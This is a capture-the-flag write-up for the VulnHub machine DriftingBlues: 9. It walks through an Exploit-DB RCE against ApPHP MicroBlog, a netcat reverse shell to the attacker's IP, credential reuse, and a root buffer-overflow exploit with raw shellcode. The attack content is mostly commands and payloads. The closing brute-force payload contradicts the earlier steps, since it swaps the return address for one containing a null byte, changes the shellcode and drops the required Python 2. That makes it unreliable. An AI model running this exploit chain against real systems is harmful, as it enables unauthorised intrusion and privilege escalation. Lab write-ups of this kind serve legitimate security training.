DriftingBlues: 9 BOOT2ROOT CTF VULNHUB WRITEUP

Welcome back to another WriteUp! In this one, I’ll walk you through the step-by-step process I used to solve the Final Machine of DriftingBlues from VulnHub!!! Let's start!!

We'll use Nmap to scan for open ports and identify possible endpoints.

nmap -A -p- -T5 192.168.172.235

Now let's visit the webpage.

Just a classic DriftingBlues Static Page

If you analyze the Nmap scan carefully, you can see that the web page is running ApPHP MicroBlog.

ApPHP MicroBlog is a lightweight, PHP-based blogging platform designed for quick setup and simple content management, often used in older web projects or educational setups. While it offers basic features like post creation, categories, and multi-author support, it has become outdated and is rarely used today due to multiple security flaws. Known vulnerabilities in versions like 1.0.1 include Remote Code Execution (RCE), Local File Inclusion (LFI), and unauthenticated file uploads, making it highly exploitable.

Let's check the source code to determine its version.

1.0.1??

Now let’s run searchsploit to directly check if there’s a known exploit available for ApPHP MicroBlog. (Sure it has, xD)

searchsploit microblog

Instant RCE for sure. Now let's use 33070.

searchsploit -m php/webapps/33070.py

The exploit is written in Python 2, the legacy version of Python.

python2 33070.py http://192.168.172.235

It works, and the output includes database credentials.

To establish a stable shell, we’ll set up a Netcat listener on our attacker machine and have the target system connect back to it.

Attacker machine:

nc -lnvp 1234

Target machine:

nc 192.168.172.246 1234 -e /bin/bash

And...

Now that we’ve gained shell access, let’s upgrade it to an interactive shell using pty and set the TERM environment variable to xterm.

python -c 'import pty;pty.spawn("/bin/bash")'

Then

export TERM=xterm

While exploring the home directory, I discovered a user named clapton. If you recall the credentials dumped earlier by the exploit, clapton's password was among them, so from here we can switch directly to the clapton user.

su clapton

We're now clapton!!!
User Flag!!

Alongside the user flag, there are two additional files:

note.txt and input

Let's check note.txt.

Alright, it looks like a Buffer Overflow is the main vulnerability here. The input file is likely a compiled binary.

It is, and it's 32-bit. Now let's execute it.

Now let's fill it up with lots of 'A's.

It results in a Segmentation Fault, confirming the presence of a Buffer Overflow vulnerability.

To dig deeper into the analysis, I transferred the binary over to my attacker machine.

Make sure that ASLR is disabled before you go any further. Otherwise, stack addresses will be unpredictable and your exploit will likely fail.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Let’s now use GDB to examine the binary in more detail.

gdb -n ./input

I input a series of 'A's once more to check whether we can take control of EIP. If EIP ends up holding a value like 0x41414141 (our 'A's), we have overwritten the saved return address, which points to a stack-based buffer overflow.

And it is!

Let’s use Metasploit’s pattern_create to generate our input.

./pattern_create.rb -l 400

Now let's get the offset of 0x41376641.

Our offset is 171.

Let's check the value of the ESP register, since that is where our input lands and where we want EIP to point. Because x86 is little endian, the address has to be written into the payload with its bytes in reverse order.

x/s $esp

Our new EIP (the address held in ESP) is 0xffffd260, which we write byte-reversed:

0xffffd260 → 0x60 0xd2 0xff 0xff → \x60\xd2\xff\xff
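The offset lookup and the little-endian conversion above, redone in plain Python as an added example (not part of the original writeup; it rebuilds the Metasploit pattern scheme rather than calling the Ruby scripts) so you can see where 171 and \x60\xd2\xff\xff come from:

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Rebuild Metasploit's cyclic pattern: Aa0Aa1...Aa9Ab0...Az9Ba0...

    Every 4-byte window is unique, so the value that lands in EIP
    identifies exactly where in the input the return address sits.
    """
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 400) -> int:
    """Offset of the 4 bytes that ended up in EIP (-1 if not found).

    gdb shows the register as an integer; on x86 (little endian) the
    bytes that sat in memory are that integer packed with '<I'.
    0x41376641 packs to b"Af7A", which the pattern holds at index 171.
    """
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def le_bytes(addr: int) -> str:
    """Render a 32-bit address as the escaped little-endian string used
    in the payload, e.g. 0xffffd260 -> \\x60\\xd2\\xff\\xff."""
    return "".join("\\x%02x" % b for b in struct.pack("<I", addr))


if __name__ == "__main__":
    print(pattern_create(400).decode())          # same as pattern_create.rb -l 400
    print(pattern_offset(0x41376641))             # 171, as found in the writeup
    print(le_bytes(0xFFFFD260))                   # \x60\xd2\xff\xff
```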

Now that we have everything we need, we can proceed to craft our payload.

PAYLOAD = OFFSET_VALUE + EIP_VALUE + NOPS + BASH_SHELL_CODE

For the shellcode, I used the one from this exploit I found on Exploit-DB.

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

This is our final payload (run it with Python 2, as in the loop below: Python 3's print would UTF-8-encode the bytes above 0x7f instead of writing them raw):

python2 -c 'print("A" * 171 + "\x60\xd2\xff\xff" + "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")'

Now let's execute it in our target machine.

Note: GDB is available on the target machine; be sure to repeat the entire process there to obtain the correct EIP value, since the stack address differs between machines.

Since we'll be executing it on a different machine where ASLR is enabled by default, we'll run the payload in a loop to increase the chances of success.

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x00\xbf\xe8\xbf" + "\x90" * 1000 + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')); done

The first attempts may fail; just keep executing it.

After a long time....

We're root!!!

Root Flag!!

We've successfully pwned DriftingBlues: 9 and completed the DriftingBlues Series!!!

The DriftingBlues series has been an incredibly enjoyable and insightful experience — starting from cronjob privilege escalation techniques to diving deep into buffer overflow exploitation. Each challenge offered a valuable learning opportunity, showcasing different aspects of Linux privilege escalation, exploitation techniques, and system misconfigurations. It’s a well-rounded series that not only tests your technical skills but also sharpens your mindset as a security researcher or CTF player. I highly recommend it to anyone aiming to strengthen their foothold in offensive security.
